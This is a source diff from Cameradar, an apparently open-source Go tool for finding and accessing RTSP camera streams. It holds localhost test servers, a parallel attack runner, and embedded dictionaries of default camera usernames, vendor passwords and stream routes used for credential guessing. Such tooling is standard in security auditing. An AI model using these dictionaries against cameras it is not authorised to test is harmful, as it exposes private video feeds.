"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
type rtspServerConfig struct {
|
||||
allowAll bool
|
||||
allowedRoute string
|
||||
requireAuth bool
|
||||
username string
|
||||
password string
|
||||
authMethod headers.AuthMethod
|
||||
authHeader base.HeaderValue
|
||||
failOnAuth bool
|
||||
setupStatus base.StatusCode
|
||||
}
|
||||
|
||||
type testServerHandler struct {
|
||||
stream *gortsplib.ServerStream
|
||||
allowAll bool
|
||||
allowedRoute string
|
||||
requireAuth bool
|
||||
username string
|
||||
password string
|
||||
authHeader base.HeaderValue
|
||||
failOnAuth bool
|
||||
setupStatus base.StatusCode
|
||||
}
|
||||
|
||||
func (h *testServerHandler) OnDescribe(ctx *gortsplib.ServerHandlerOnDescribeCtx) (*base.Response, *gortsplib.ServerStream, error) {
|
||||
if !h.routeAllowed(ctx.Path) {
|
||||
return &base.Response{StatusCode: base.StatusNotFound}, nil, nil
|
||||
}
|
||||
|
||||
if h.failOnAuth && len(ctx.Request.Header["Authorization"]) > 0 {
|
||||
return &base.Response{StatusCode: base.StatusBadRequest}, nil, errors.New("forced auth failure")
|
||||
}
|
||||
|
||||
if h.requireAuth && !ctx.Conn.VerifyCredentials(ctx.Request, h.username, h.password) {
|
||||
return &base.Response{
|
||||
StatusCode: base.StatusUnauthorized,
|
||||
Header: base.Header{
|
||||
"WWW-Authenticate": h.authHeader,
|
||||
},
|
||||
}, nil, liberrors.ErrServerAuth{}
|
||||
}
|
||||
|
||||
return &base.Response{StatusCode: base.StatusOK}, h.stream, nil
|
||||
}
|
||||
|
||||
func (h *testServerHandler) OnSetup(ctx *gortsplib.ServerHandlerOnSetupCtx) (*base.Response, *gortsplib.ServerStream, error) {
|
||||
if !h.routeAllowed(ctx.Path) {
|
||||
return &base.Response{StatusCode: base.StatusNotFound}, nil, nil
|
||||
}
|
||||
|
||||
if h.requireAuth && !ctx.Conn.VerifyCredentials(ctx.Request, h.username, h.password) {
|
||||
return &base.Response{
|
||||
StatusCode: base.StatusUnauthorized,
|
||||
Header: base.Header{
|
||||
"WWW-Authenticate": h.authHeader,
|
||||
},
|
||||
}, nil, liberrors.ErrServerAuth{}
|
||||
}
|
||||
|
||||
status := base.StatusOK
|
||||
if h.setupStatus != 0 {
|
||||
status = h.setupStatus
|
||||
}
|
||||
|
||||
return &base.Response{StatusCode: status}, h.stream, nil
|
||||
}
|
||||
|
||||
func (h *testServerHandler) routeAllowed(path string) bool {
|
||||
path = strings.TrimLeft(path, "/")
|
||||
return h.allowAll || path == h.allowedRoute
|
||||
}
|
||||
|
||||
func startRTSPServer(t *testing.T, cfg rtspServerConfig) (netip.Addr, uint16) {
|
||||
t.Helper()
|
||||
|
||||
handler := &testServerHandler{
|
||||
allowAll: cfg.allowAll,
|
||||
allowedRoute: cfg.allowedRoute,
|
||||
requireAuth: cfg.requireAuth,
|
||||
username: cfg.username,
|
||||
password: cfg.password,
|
||||
failOnAuth: cfg.failOnAuth,
|
||||
setupStatus: cfg.setupStatus,
|
||||
}
|
||||
|
||||
if len(cfg.authHeader) > 0 {
|
||||
handler.authHeader = cfg.authHeader
|
||||
} else {
|
||||
authHeader := headers.Authenticate{
|
||||
Method: cfg.authMethod,
|
||||
Realm: "cameradar",
|
||||
}
|
||||
if cfg.authMethod == headers.AuthMethodDigest {
|
||||
authHeader.Nonce = "nonce"
|
||||
}
|
||||
handler.authHeader = authHeader.Marshal()
|
||||
}
|
||||
|
||||
server := &gortsplib.Server{
|
||||
Handler: handler,
|
||||
RTSPAddress: "127.0.0.1:0",
|
||||
AuthMethods: authMethods(cfg.authMethod),
|
||||
}
|
||||
|
||||
err := server.Start()
|
||||
require.NoError(t, err)
|
||||
t.Cleanup(server.Close)
|
||||
|
||||
desc := &description.Session{
|
||||
Medias: []*description.Media{{
|
||||
Type: description.MediaTypeVideo,
|
||||
Formats: []format.Format{&format.H264{
|
||||
PayloadTyp: 96,
|
||||
PacketizationMode: 1,
|
||||
}},
|
||||
}},
|
||||
}
|
||||
|
||||
stream := &gortsplib.ServerStream{
|
||||
Server: server,
|
||||
Desc: desc,
|
||||
}
|
||||
err = stream.Initialize()
|
||||
require.NoError(t, err)
|
||||
t.Cleanup(stream.Close)
|
||||
|
||||
handler.stream = stream
|
||||
|
||||
listener := server.NetListener()
|
||||
require.NotNil(t, listener)
|
||||
|
||||
tcpAddr, ok := listener.Addr().(*net.TCPAddr)
|
||||
require.True(t, ok)
|
||||
|
||||
return netip.MustParseAddr("127.0.0.1"), uint16(tcpAddr.Port)
|
||||
}
|
||||
|
||||
func authMethods(method headers.AuthMethod) []auth.VerifyMethod {
|
||||
switch method {
|
||||
case headers.AuthMethodDigest:
|
||||
return []auth.VerifyMethod{auth.VerifyMethodDigestMD5}
|
||||
case headers.AuthMethodBasic:
|
||||
return []auth.VerifyMethod{auth.VerifyMethodBasic}
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,86 @@
|
||||
package attack
|
||||
|
||||
import (
|
||||
"net/netip"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestBuildRTSPURL(t *testing.T) {
|
||||
stream := cameradar.Stream{
|
||||
Address: netip.MustParseAddr("192.168.0.10"),
|
||||
Port: 554,
|
||||
}
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
route string
|
||||
username string
|
||||
password string
|
||||
wantURL string
|
||||
}{
|
||||
{
|
||||
name: "empty route",
|
||||
wantURL: "rtsp://192.168.0.10:554/",
|
||||
},
|
||||
{
|
||||
name: "root route",
|
||||
route: "/",
|
||||
wantURL: "rtsp://192.168.0.10:554/",
|
||||
},
|
||||
{
|
||||
name: "multiple leading slashes",
|
||||
route: "////",
|
||||
wantURL: "rtsp://192.168.0.10:554/",
|
||||
},
|
||||
{
|
||||
name: "route with no leading slash",
|
||||
route: "stream",
|
||||
wantURL: "rtsp://192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "route with leading slash",
|
||||
route: "/stream",
|
||||
wantURL: "rtsp://192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "route with trailing slash",
|
||||
route: "stream/",
|
||||
wantURL: "rtsp://192.168.0.10:554/stream/",
|
||||
},
|
||||
{
|
||||
name: "route with spaces",
|
||||
route: " /stream ",
|
||||
wantURL: "rtsp://192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "username and password",
|
||||
route: "stream",
|
||||
username: "admin",
|
||||
password: "admin123",
|
||||
wantURL: "rtsp://admin:admin123@192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "empty username with password",
|
||||
route: "stream",
|
||||
password: "pass",
|
||||
wantURL: "rtsp://:pass@192.168.0.10:554/stream",
|
||||
},
|
||||
{
|
||||
name: "username only",
|
||||
route: "stream",
|
||||
username: "user",
|
||||
wantURL: "rtsp://user:@192.168.0.10:554/stream",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
_, gotURL, err := buildRTSPURL(stream, test.route, test.username, test.password)
|
||||
require.NoError(t, err)
|
||||
require.Equal(t, test.wantURL, gotURL)
|
||||
})
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,105 @@
|
||||
package attack
|
||||
|
||||
import (
|
||||
"context"
|
||||
"runtime"
|
||||
"sync"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
type attackFn func(context.Context, cameradar.Stream) (cameradar.Stream, error)
|
||||
|
||||
func runParallel(ctx context.Context, targets []cameradar.Stream, fn attackFn) ([]cameradar.Stream, error) {
|
||||
if len(targets) == 0 {
|
||||
return targets, nil
|
||||
}
|
||||
|
||||
workerCount := parallelWorkerCount(len(targets))
|
||||
if workerCount == 0 {
|
||||
return targets, nil
|
||||
}
|
||||
|
||||
errCh := make(chan error, 1)
|
||||
jobs := make(chan attackJob)
|
||||
|
||||
updated := make([]cameradar.Stream, len(targets))
|
||||
copy(updated, targets)
|
||||
|
||||
ctx, cancel := context.WithCancel(ctx)
|
||||
defer cancel()
|
||||
|
||||
var wg sync.WaitGroup
|
||||
for range workerCount {
|
||||
wg.Go(func() {
|
||||
runWorker(ctx, jobs, cancel, fn, updated, errCh)
|
||||
})
|
||||
}
|
||||
|
||||
queueJobs(ctx, jobs, targets)
|
||||
close(jobs)
|
||||
|
||||
wg.Wait()
|
||||
|
||||
select {
|
||||
case err := <-errCh:
|
||||
return updated, err
|
||||
default:
|
||||
}
|
||||
|
||||
return updated, nil
|
||||
}
|
||||
|
||||
type attackJob struct {
|
||||
index int
|
||||
stream cameradar.Stream
|
||||
}
|
||||
|
||||
func queueJobs(ctx context.Context, jobs chan<- attackJob, targets []cameradar.Stream) {
|
||||
for i, stream := range targets {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case jobs <- attackJob{index: i, stream: stream}:
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func runWorker(ctx context.Context, jobs <-chan attackJob, cancelFn func(), fn attackFn, updated []cameradar.Stream, errCh chan error) {
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case job, ok := <-jobs:
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
|
||||
stream, err := fn(ctx, job.stream)
|
||||
if err != nil {
|
||||
select {
|
||||
case errCh <- err:
|
||||
default:
|
||||
}
|
||||
|
||||
cancelFn()
|
||||
return
|
||||
}
|
||||
|
||||
updated[job.index] = stream
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func parallelWorkerCount(targetCount int) int {
|
||||
if targetCount <= 0 {
|
||||
return 0
|
||||
}
|
||||
|
||||
workers := max(runtime.GOMAXPROCS(0), 1)
|
||||
if targetCount < workers {
|
||||
return targetCount
|
||||
}
|
||||
|
||||
return workers
|
||||
}
|
||||
@@ -0,0 +1,81 @@
|
||||
{
|
||||
"usernames": [
|
||||
"",
|
||||
"666666",
|
||||
"888888",
|
||||
"Admin",
|
||||
"admin",
|
||||
"admin1",
|
||||
"administrator",
|
||||
"Administrator",
|
||||
"aiphone",
|
||||
"Dinion",
|
||||
"none",
|
||||
"root",
|
||||
"Root",
|
||||
"service",
|
||||
"supervisor",
|
||||
"ubnt"
|
||||
],
|
||||
"passwords": [
|
||||
"",
|
||||
"0000",
|
||||
"00000",
|
||||
"1111",
|
||||
"111111",
|
||||
"1111111",
|
||||
"123",
|
||||
"1234",
|
||||
"12345",
|
||||
"123456",
|
||||
"1234567",
|
||||
"12345678",
|
||||
"123456789",
|
||||
"12345678910",
|
||||
"4321",
|
||||
"666666",
|
||||
"6fJjMKYx",
|
||||
"888888",
|
||||
"9999",
|
||||
"admin",
|
||||
"admin123456",
|
||||
"admin pass",
|
||||
"Admin",
|
||||
"admin123",
|
||||
"administrator",
|
||||
"Administrator",
|
||||
"aiphone",
|
||||
"camera",
|
||||
"Camera",
|
||||
"fliradmin",
|
||||
"GRwvcj8j",
|
||||
"hikvision",
|
||||
"hikadmin",
|
||||
"HuaWei123",
|
||||
"ikwd",
|
||||
"jvc",
|
||||
"kj3TqCWv",
|
||||
"meinsm",
|
||||
"pass",
|
||||
"Pass",
|
||||
"password",
|
||||
"password123",
|
||||
"qwerty",
|
||||
"qwerty123",
|
||||
"Recorder",
|
||||
"reolink",
|
||||
"root",
|
||||
"service",
|
||||
"supervisor",
|
||||
"support",
|
||||
"system",
|
||||
"tlJwpbo6",
|
||||
"toor",
|
||||
"tp-link",
|
||||
"ubnt",
|
||||
"user",
|
||||
"wbox",
|
||||
"wbox123",
|
||||
"Y5eIMz3C"
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,197 @@
|
||||
|
||||
live/ch01_0
|
||||
0/1:1/main
|
||||
0/usrnm:pwd/main
|
||||
0/video1
|
||||
1
|
||||
1.AMP
|
||||
1/h264major
|
||||
1/stream1
|
||||
11
|
||||
12
|
||||
125
|
||||
1080p
|
||||
1440p
|
||||
480p
|
||||
4K
|
||||
666
|
||||
720p
|
||||
AVStream1_1
|
||||
CAM_ID.password.mp2
|
||||
CH001.sdp
|
||||
GetData.cgi
|
||||
HD
|
||||
HighResolutionVideo
|
||||
LowResolutionVideo
|
||||
MediaInput/h264
|
||||
MediaInput/mpeg4
|
||||
ONVIF/MediaInput
|
||||
ONVIF/MediaInput?profile=4_def_profile6
|
||||
StdCh1
|
||||
Streaming/Channels/1
|
||||
Streaming/Unicast/channels/101
|
||||
StreamingSetting?version=1.0&action=getRTSPStream&ChannelID=1&ChannelName=Channel1
|
||||
VideoInput/1/h264/1
|
||||
VideoInput/1/mpeg4/1
|
||||
access_code
|
||||
access_name_for_stream_1_to_5
|
||||
api/mjpegvideo.cgi
|
||||
av0_0
|
||||
av2
|
||||
avc
|
||||
avn=2
|
||||
axis-media/media.amp
|
||||
axis-media/media.amp?camera=1
|
||||
axis-media/media.amp?videocodec=h264
|
||||
cam
|
||||
cam/realmonitor
|
||||
cam/realmonitor?channel=0&subtype=0
|
||||
cam/realmonitor?channel=1&subtype=0
|
||||
cam/realmonitor?channel=1&subtype=1
|
||||
cam/realmonitor?channel=1&subtype=1&unicast=true&proto=Onvif
|
||||
cam0
|
||||
cam0_0
|
||||
cam0_1
|
||||
cam1
|
||||
cam1/h264
|
||||
cam1/h264/multicast
|
||||
cam1/mjpeg
|
||||
cam1/mpeg4
|
||||
cam1/mpeg4?user='username'&pwd='password'
|
||||
cam1/onvif-h264
|
||||
camera.stm
|
||||
ch0
|
||||
ch00/0
|
||||
ch001.sdp
|
||||
ch01.264
|
||||
ch01.264?
|
||||
ch01.264?ptype=tcp
|
||||
ch1_0
|
||||
ch2_0
|
||||
ch3_0
|
||||
ch4_0
|
||||
ch1/0
|
||||
ch2/0
|
||||
ch3/0
|
||||
ch4/0
|
||||
ch0_0.h264
|
||||
ch0_unicast_firststream
|
||||
ch0_unicast_secondstream
|
||||
ch1-s1
|
||||
channel1
|
||||
gnz_media/main
|
||||
h264
|
||||
h264.sdp
|
||||
h264/ch1/sub/av_stream
|
||||
h264/media.amp
|
||||
h264Preview_01_main
|
||||
h264Preview_01_sub
|
||||
h264_vga.sdp
|
||||
h264_stream
|
||||
image.mpg
|
||||
img/media.sav
|
||||
img/media.sav?channel=1
|
||||
img/video.asf
|
||||
img/video.sav
|
||||
ioImage/1
|
||||
ipcam.sdp
|
||||
ipcam_h264.sdp
|
||||
ipcam_mjpeg.sdp
|
||||
live
|
||||
live.sdp
|
||||
live/av0
|
||||
live/ch0
|
||||
live/ch00_0
|
||||
live/ch01_0
|
||||
live/h264
|
||||
live/main
|
||||
live/main0
|
||||
live/mpeg4
|
||||
live1.sdp
|
||||
live3.sdp
|
||||
live_mpeg4.sdp
|
||||
live_st1
|
||||
livestream
|
||||
main
|
||||
media
|
||||
media.amp
|
||||
media.amp?streamprofile=Profile1
|
||||
media/media.amp
|
||||
media/video1
|
||||
medias2
|
||||
mjpeg/media.smp
|
||||
mp4
|
||||
mpeg/media.amp
|
||||
mpeg4
|
||||
mpeg4/1/media.amp
|
||||
mpeg4/media.amp
|
||||
mpeg4/media.smp
|
||||
mpeg4unicast
|
||||
mpg4/rtsp.amp
|
||||
multicaststream
|
||||
now.mp4
|
||||
nph-h264.cgi
|
||||
nphMpeg4/g726-640x
|
||||
nphMpeg4/g726-640x48
|
||||
nphMpeg4/g726-640x480
|
||||
nphMpeg4/nil-320x240
|
||||
onvif-media/media.amp
|
||||
onvif1
|
||||
pass@10.0.0.5:6667/blinkhd
|
||||
play1.sdp
|
||||
play2.sdp
|
||||
profile0
|
||||
profile1
|
||||
profile2
|
||||
profile2/media.smp
|
||||
profile5/media.smp
|
||||
rtpvideo1.sdp
|
||||
rtsp_live0
|
||||
rtsp_live1
|
||||
rtsp_live2
|
||||
rtsp_tunnel
|
||||
rtsph264
|
||||
rtsph2641080p
|
||||
snap.jpg
|
||||
stream
|
||||
stream/0
|
||||
stream/1
|
||||
stream/live.sdp
|
||||
stream.sdp
|
||||
stream1
|
||||
streaming/channels/0
|
||||
streaming/channels/1
|
||||
streaming/channels/101
|
||||
tcp/av0_0
|
||||
test
|
||||
tmpfs/auto.jpg
|
||||
trackID=1
|
||||
ucast/11
|
||||
udp/av0_0
|
||||
udp/unicast/aiphone_H264
|
||||
udpstream
|
||||
user.pin.mp2
|
||||
user=admin&password=&channel=1&stream=0.sdp?
|
||||
user=admin&password=&channel=1&stream=0.sdp?real_stream
|
||||
user=admin_password=?????_channel=1_stream=0.sdp?real_stream
|
||||
user=admin_password=R5XFY888_channel=1_stream=0.sdp?real_stream
|
||||
user_defined
|
||||
v2
|
||||
video
|
||||
video.3gp
|
||||
video.h264
|
||||
video.mjpg
|
||||
video.mp4
|
||||
video.pro1
|
||||
video.pro2
|
||||
video.pro3
|
||||
video0
|
||||
video0.sdp
|
||||
video1
|
||||
video1.sdp
|
||||
video1+audio1
|
||||
videoMain
|
||||
videoinput_1/h264_1/media.stm
|
||||
videostream.asf
|
||||
vis
|
||||
wfov
|
||||
@@ -0,0 +1,11 @@
|
||||
package dict
|
||||
|
||||
import (
|
||||
_ "embed"
|
||||
)
|
||||
|
||||
//go:embed assets/credentials.json
|
||||
var defaultCredentials []byte
|
||||
|
||||
//go:embed assets/routes
|
||||
var defaultRoutes string
|
||||
@@ -0,0 +1,134 @@
|
||||
package dict
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// credentials is a map of credentials.
|
||||
type credentials struct {
|
||||
Usernames []string `json:"usernames"`
|
||||
Passwords []string `json:"passwords"`
|
||||
}
|
||||
|
||||
// routes is a slice of routes.
|
||||
type routes []string
|
||||
|
||||
// Dictionary groups routes and credentials for attacks.
|
||||
type Dictionary struct {
|
||||
creds credentials
|
||||
routes routes
|
||||
}
|
||||
|
||||
// Usernames returns the usernames list.
|
||||
func (d Dictionary) Usernames() []string {
|
||||
return d.creds.Usernames
|
||||
}
|
||||
|
||||
// Passwords returns the passwords list.
|
||||
func (d Dictionary) Passwords() []string {
|
||||
return d.creds.Passwords
|
||||
}
|
||||
|
||||
// Routes returns the routes list.
|
||||
func (d Dictionary) Routes() []string {
|
||||
return d.routes
|
||||
}
|
||||
|
||||
// New loads a dictionary using the provided configuration.
|
||||
func New(credentialsPath, routesPath string) (Dictionary, error) {
|
||||
creds, err := loadCredentials(credentialsPath)
|
||||
if err != nil {
|
||||
return Dictionary{}, err
|
||||
}
|
||||
|
||||
routes, err := loadRoutes(routesPath)
|
||||
if err != nil {
|
||||
return Dictionary{}, err
|
||||
}
|
||||
|
||||
return Dictionary{
|
||||
creds: creds,
|
||||
routes: routes,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// loadCredentials loads credentials from a custom path or embedded defaults.
|
||||
func loadCredentials(credentialsPath string) (credentials, error) {
|
||||
if strings.TrimSpace(credentialsPath) != "" {
|
||||
content, err := os.ReadFile(credentialsPath)
|
||||
if err != nil {
|
||||
return credentials{}, fmt.Errorf("reading credentials dictionary %q: %w", credentialsPath, err)
|
||||
}
|
||||
|
||||
creds, err := parseCredentials(content)
|
||||
if err != nil {
|
||||
return credentials{}, err
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
creds, err := parseCredentials(defaultCredentials)
|
||||
if err != nil {
|
||||
return credentials{}, err
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
// loadRoutes loads routes from a custom path or embedded defaults.
|
||||
func loadRoutes(routesPath string) (routes, error) {
|
||||
if strings.TrimSpace(routesPath) != "" {
|
||||
file, err := os.Open(routesPath)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("opening routes dictionary %q: %w", routesPath, err)
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
routes, err := parseRoutes(file)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return routes, nil
|
||||
}
|
||||
|
||||
reader := strings.NewReader(defaultRoutes)
|
||||
routes, err := parseRoutes(io.NopCloser(reader))
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return routes, nil
|
||||
}
|
||||
|
||||
func parseCredentials(content []byte) (credentials, error) {
|
||||
if len(content) == 0 {
|
||||
return credentials{}, errors.New("credentials dictionary is empty")
|
||||
}
|
||||
|
||||
var creds credentials
|
||||
err := json.Unmarshal(content, &creds)
|
||||
if err != nil {
|
||||
return credentials{}, fmt.Errorf("reading dictionary contents: %w", err)
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
func parseRoutes(reader io.ReadCloser) (routes, error) {
|
||||
defer reader.Close()
|
||||
|
||||
var routes routes
|
||||
scanner := bufio.NewScanner(reader)
|
||||
for scanner.Scan() {
|
||||
routes = append(routes, scanner.Text())
|
||||
}
|
||||
|
||||
return routes, scanner.Err()
|
||||
}
|
||||
@@ -0,0 +1,163 @@
|
||||
package dict_test
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"errors"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6/internal/dict"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestNew_LoadsDictionaryFromPaths(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
credsPath := writeTempFile(t, tempDir, "creds.json", `{"usernames":["alice"],"passwords":["secret"]}`)
|
||||
routesPath := writeTempFile(t, tempDir, "routes", "stream\nother\n")
|
||||
|
||||
got, err := dict.New(credsPath, routesPath)
|
||||
require.NoError(t, err)
|
||||
|
||||
assert.Equal(t, []string{"alice"}, got.Usernames())
|
||||
assert.Equal(t, []string{"secret"}, got.Passwords())
|
||||
assert.Equal(t, []string{"stream", "other"}, got.Routes())
|
||||
}
|
||||
|
||||
func TestNew_CustomAndDefaultPaths(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
customCredsPath := writeTempFile(t, tempDir, "creds.json", `{"usernames":["alice"],"passwords":["secret"]}`)
|
||||
customRoutesPath := writeTempFile(t, tempDir, "routes", "stream\nother\n")
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
credentialsPath string
|
||||
routesPath string
|
||||
assertFunc func(t *testing.T, got dict.Dictionary)
|
||||
}{
|
||||
{
|
||||
name: "custom credentials and routes",
|
||||
credentialsPath: customCredsPath,
|
||||
routesPath: customRoutesPath,
|
||||
assertFunc: func(t *testing.T, got dict.Dictionary) {
|
||||
assert.Equal(t, []string{"alice"}, got.Usernames())
|
||||
assert.Equal(t, []string{"secret"}, got.Passwords())
|
||||
assert.Equal(t, []string{"stream", "other"}, got.Routes())
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "custom credentials default routes",
|
||||
credentialsPath: customCredsPath,
|
||||
assertFunc: func(t *testing.T, got dict.Dictionary) {
|
||||
assert.Equal(t, []string{"alice"}, got.Usernames())
|
||||
assert.Equal(t, []string{"secret"}, got.Passwords())
|
||||
assert.NotEmpty(t, got.Routes())
|
||||
assert.Contains(t, got.Routes(), "stream")
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "default credentials custom routes",
|
||||
routesPath: customRoutesPath,
|
||||
assertFunc: func(t *testing.T, got dict.Dictionary) {
|
||||
assert.NotEmpty(t, got.Usernames())
|
||||
assert.Contains(t, got.Usernames(), "admin")
|
||||
assert.NotEmpty(t, got.Passwords())
|
||||
assert.Contains(t, got.Passwords(), "admin")
|
||||
assert.Equal(t, []string{"stream", "other"}, got.Routes())
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "whitespace paths use defaults",
|
||||
credentialsPath: " \t\n",
|
||||
routesPath: "\n\t",
|
||||
assertFunc: func(t *testing.T, got dict.Dictionary) {
|
||||
assert.NotEmpty(t, got.Usernames())
|
||||
assert.Contains(t, got.Usernames(), "admin")
|
||||
assert.NotEmpty(t, got.Passwords())
|
||||
assert.Contains(t, got.Passwords(), "admin")
|
||||
assert.NotEmpty(t, got.Routes())
|
||||
assert.Contains(t, got.Routes(), "stream")
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
got, err := dict.New(test.credentialsPath, test.routesPath)
|
||||
require.NoError(t, err)
|
||||
test.assertFunc(t, got)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestNew_Errors(t *testing.T) {
|
||||
tempDir := t.TempDir()
|
||||
validCredsPath := writeTempFile(t, tempDir, "creds.json", `{"usernames":["alice"],"passwords":["secret"]}`)
|
||||
validRoutesPath := writeTempFile(t, tempDir, "routes", "stream\n")
|
||||
invalidJSONPath := writeTempFile(t, tempDir, "invalid.json", "{")
|
||||
emptyCredsPath := writeTempFile(t, tempDir, "empty.json", "")
|
||||
longRoute := strings.Repeat("a", bufio.MaxScanTokenSize+1)
|
||||
tooLongRoutesPath := writeTempFile(t, tempDir, "routes-too-long", longRoute)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
credentialsPath string
|
||||
routesPath string
|
||||
wantErrContains string
|
||||
wantErrIs error
|
||||
}{
|
||||
{
|
||||
name: "missing credentials file",
|
||||
credentialsPath: filepath.Join(tempDir, "missing.json"),
|
||||
routesPath: validRoutesPath,
|
||||
wantErrContains: "reading credentials dictionary",
|
||||
},
|
||||
{
|
||||
name: "invalid credentials json",
|
||||
credentialsPath: invalidJSONPath,
|
||||
routesPath: validRoutesPath,
|
||||
wantErrContains: "reading dictionary contents",
|
||||
},
|
||||
{
|
||||
name: "empty credentials file",
|
||||
credentialsPath: emptyCredsPath,
|
||||
routesPath: validRoutesPath,
|
||||
wantErrContains: "credentials dictionary is empty",
|
||||
},
|
||||
{
|
||||
name: "missing routes file",
|
||||
credentialsPath: validCredsPath,
|
||||
routesPath: filepath.Join(tempDir, "missing-routes"),
|
||||
wantErrContains: "opening routes dictionary",
|
||||
},
|
||||
{
|
||||
name: "routes file too long",
|
||||
credentialsPath: validCredsPath,
|
||||
routesPath: tooLongRoutesPath,
|
||||
wantErrIs: bufio.ErrTooLong,
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
_, err := dict.New(test.credentialsPath, test.routesPath)
|
||||
require.Error(t, err)
|
||||
|
||||
if test.wantErrContains != "" {
|
||||
assert.ErrorContains(t, err, test.wantErrContains)
|
||||
}
|
||||
if test.wantErrIs != nil {
|
||||
assert.True(t, errors.Is(err, test.wantErrIs))
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func writeTempFile(t *testing.T, dir, name, content string) string {
|
||||
t.Helper()
|
||||
path := filepath.Join(dir, name)
|
||||
require.NoError(t, os.WriteFile(path, []byte(content), 0o600))
|
||||
return path
|
||||
}
|
||||
@@ -0,0 +1,123 @@
|
||||
package output
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
)
|
||||
|
||||
type m3uReporter struct {
|
||||
delegate ui.Reporter
|
||||
outputPath string
|
||||
}
|
||||
|
||||
// NewM3UReporter wraps the provided reporter and writes an M3U playlist on summary.
|
||||
func NewM3UReporter(delegate ui.Reporter, outputPath string) ui.Reporter {
|
||||
return &m3uReporter{
|
||||
delegate: delegate,
|
||||
outputPath: strings.TrimSpace(outputPath),
|
||||
}
|
||||
}
|
||||
|
||||
func (r *m3uReporter) Start(step cameradar.Step, message string) {
|
||||
r.delegate.Start(step, message)
|
||||
}
|
||||
|
||||
func (r *m3uReporter) Done(step cameradar.Step, message string) {
|
||||
r.delegate.Done(step, message)
|
||||
}
|
||||
|
||||
func (r *m3uReporter) Progress(step cameradar.Step, message string) {
|
||||
r.delegate.Progress(step, message)
|
||||
}
|
||||
|
||||
func (r *m3uReporter) Debug(step cameradar.Step, message string) {
|
||||
r.delegate.Debug(step, message)
|
||||
}
|
||||
|
||||
func (r *m3uReporter) Error(step cameradar.Step, err error) {
|
||||
r.delegate.Error(step, err)
|
||||
}
|
||||
|
||||
func (r *m3uReporter) Summary(streams []cameradar.Stream, err error) {
|
||||
r.delegate.Summary(streams, err)
|
||||
if r.outputPath == "" {
|
||||
return
|
||||
}
|
||||
|
||||
writeErr := writeM3UFile(r.outputPath, streams)
|
||||
if writeErr != nil {
|
||||
r.delegate.Error(cameradar.StepSummary, writeErr)
|
||||
}
|
||||
}
|
||||
|
||||
func (r *m3uReporter) UpdateSummary(streams []cameradar.Stream) {
|
||||
updater, ok := r.delegate.(interface{ UpdateSummary([]cameradar.Stream) })
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
updater.UpdateSummary(streams)
|
||||
}
|
||||
|
||||
func (r *m3uReporter) Close() {
|
||||
r.delegate.Close()
|
||||
}
|
||||
|
||||
func writeM3UFile(path string, streams []cameradar.Stream) error {
|
||||
content := BuildM3U(streams)
|
||||
dir := filepath.Dir(path)
|
||||
if dir != "." {
|
||||
err := os.MkdirAll(dir, 0o750)
|
||||
if err != nil {
|
||||
return fmt.Errorf("creating output directory %q: %w", dir, err)
|
||||
}
|
||||
}
|
||||
|
||||
err := os.WriteFile(path, []byte(content), 0o600)
|
||||
if err != nil {
|
||||
return fmt.Errorf("writing m3u output: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
